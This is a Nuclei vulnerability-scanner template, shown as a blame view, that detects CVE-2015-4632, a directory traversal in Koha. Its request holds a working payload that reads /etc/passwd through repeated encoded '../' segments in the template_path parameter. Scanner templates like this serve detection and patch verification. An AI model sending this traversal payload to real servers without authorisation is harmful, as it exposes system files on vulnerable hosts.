my-nuclei-templates/CVE-2015-4632.yaml

36 lines
1.2 KiB
YAML
Raw Permalink Normal View History

2021-11-09 22:49:13 +00:00
id: CVE-2015-4632
info:
name: Koha 3.20.1 - Directory Traversal
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
reference:
2021-11-09 22:49:13 +00:00
- https://www.exploit-db.com/exploits/37388
- https://www.cvedetails.com/cve/CVE-2015-4632
2022-06-18 08:05:25 +00:00
- https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/
2021-11-09 22:49:13 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 7.5
2021-11-09 22:49:13 +00:00
cve-id: CVE-2015-4632
cwe-id: CWE-22
2022-06-18 08:05:25 +00:00
tags: cve,cve2015,lfi
2021-11-09 22:49:13 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-11-09 22:49:13 +00:00
- type: status
status:
2022-06-18 08:05:25 +00:00
- 200
# Enhanced by mp on 2022/06/08